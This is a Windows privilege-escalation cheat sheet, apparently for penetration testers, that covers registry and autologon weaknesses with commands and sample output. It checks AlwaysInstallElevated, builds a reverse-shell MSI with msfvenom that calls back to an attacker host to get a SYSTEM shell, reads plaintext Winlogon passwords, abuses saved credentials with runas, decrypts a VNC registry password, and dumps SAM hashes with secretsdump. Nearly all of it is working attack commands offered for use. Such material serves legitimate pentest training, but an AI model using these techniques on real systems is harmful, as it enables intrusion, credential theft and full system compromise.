REGISTRY & AUTOLOGON

AlwaysInstallElevated

Both must be 1 — Install MSI as SYSTEM

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Example Output
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  AlwaysInstallElevated  REG_DWORD  0x1

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  AlwaysInstallElevated  REG_DWORD  0x1

BOTH must be 1 to exploit!
(If only one = not vulnerable)

Exploit AlwaysInstallElevated

Generate malicious MSI — Runs as SYSTEM

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f msi -o shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi
Example Output
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f msi -o shell.msi

Transfer to target:
msiexec /quiet /qn /i C:\temp\shell.msi

Attacker nc -nlvp 443:
C:\Windows\system32> whoami
nt authority\system
(MSI installs as SYSTEM when both keys = 1)

AutoLogon credentials

Stored plaintext credentials — Auto-login configured

reg query 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' /v DefaultUserName
reg query 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' /v DefaultPassword
Example Output
reg query 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
  DefaultUserName    REG_SZ  administrator
  DefaultPassword    REG_SZ  Admin@123!
(Plaintext admin credentials in registry)

Saved credentials

Cached credentials — Run commands as stored user

cmdkey /list
runas /savecred /user:admin cmd.exe
Example Output
cmdkey /list
  Target: Domain:interactive=CORP\administrator
  Type: Domain Password
  User: CORP\administrator

runas /savecred /user:CORP\administrator cmd.exe
C:\> whoami
corp\administrator

Search registry for passwords — VNC, PuTTY, other apps store creds

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Example Output
reg query HKLM /f password /t REG_SZ /s
HKLM\SOFTWARE\VNC\Password  REG_SZ  5A003B2F...

VNC password decrypt:
vncpwd.exe 5A003B2F...
Result: s3cr3t!
(VNC and other apps store creds in registry)

SAM/SYSTEM backup files

Backup registry hives — Extract hashes offline

dir C:\Windows\Repair\SAM
dir C:\Windows\System32\config\RegBack\
Example Output
dir C:\Windows\Repair\SAM
01/15/2020  SAM
01/15/2020  SYSTEM

copy C:\Windows\Repair\SAM C:\temp\
copy C:\Windows\Repair\SYSTEM C:\temp\

impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Administrator:500:aad3b...:31d6cfe...